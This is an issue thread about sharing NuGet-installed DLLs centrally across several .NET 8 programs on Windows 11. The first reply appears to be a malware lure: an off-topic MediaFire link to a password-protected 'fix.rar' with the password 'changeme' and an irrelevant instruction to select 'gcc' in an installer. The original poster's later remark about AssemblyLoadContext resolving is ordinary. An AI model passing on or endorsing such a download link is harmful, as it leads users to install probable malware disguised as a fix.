### ISSUE TITLE
Nuget dependencies are stored centrally

### ISSUE THREAD

**Issue by jiasss** [microsoft/dotnet#1445]
How do I centralize the installation package through Nuget so that it can be loaded correctly at runtime, so that the DLL file can be shared in multiple programs?

environment: windows11 .net8.0

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jiasss** [comment]
Dependencies can be loaded using AssemblyLoadContext.Default.Resolving, but the Tomlyn package can't use that method
